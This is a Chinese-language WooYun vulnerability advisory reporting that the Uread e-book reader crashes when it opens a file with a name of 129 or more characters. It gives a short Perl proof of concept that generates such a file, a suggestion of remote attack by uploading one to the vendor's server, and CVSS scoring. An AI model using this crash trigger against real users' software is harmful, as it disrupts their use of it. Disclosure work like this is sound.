当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-07191

漏洞标题:Uread阅读器拒绝服务漏洞

相关厂商:至善读书

漏洞作者: demonalex

提交时间:2012-05-16 15:03

修复时间:2012-06-30 15:03

公开时间:2012-06-30 15:03

漏洞类型:拒绝服务

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-05-16: 细节已通知厂商并且等待厂商处理中
2012-05-21: 厂商已经确认,细节仅向厂商公开
2012-05-24: 细节向第三方安全合作伙伴开放
2012-07-15: 细节向核心白帽子及相关领域专家公开
2012-07-25: 细节向普通白帽子公开
2012-08-04: 细节向实习白帽子公开
2012-06-30: 细节向公众公开

简要描述:

Uread阅读器在远程或本地打开upub等文件时,没有对文件名的长度进行过滤,导致打开过长文件名将引起程序崩溃。

详细说明:

Uread阅读器在远程或本地打开文件名过长(大于或等于129个字符)的upub等文件时将引起uread.exe程序无法正常工作,必须重新启动uread.exe进程方可。
远程攻击者可考虑将过长文件名的文件上传至“至善读书”的服务器端,实现远程拒绝服务攻击。

漏洞证明:

Proof Of Concept :
-----------------------------------------------------------
#!/usr/bin/perl -w
$filename="a"x129;
print "------Generate testfile \"a\"x129.epub------\n";
open(TESTFILE, ">$filename.epub");
sleep(3);
close(TESTFILE);
print "------Complete!------\n";
exit(1);
-----------------------------------------------------------

修复方案:

目前厂商还没有提供补丁或者升级程序。

版权声明:转载请注明来源 demonalex@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2012-05-21 00:26

厂商回复:

CNVD确认漏洞并复现所述情况,转由CNCERT协调厂商处置。
对漏洞评分如下:
CVSS:(AV:L/AC:L/Au:NR/C:N/A:C/I:N/B:N) score:4.68(最高10分,中危)
即:本地攻击、攻击难度低、不需要用户认证,对可用性造成完全影响。
技术难度系数:1.1(本地拒绝服务类)
影响危害系数:1.1(一般,终端用户产品)
CNVD综合评分:4.68*1.1*1.1=5.663
demonalex对于通用软件的研究目前在wooyun看比较少,rank +3

最新状态:

暂无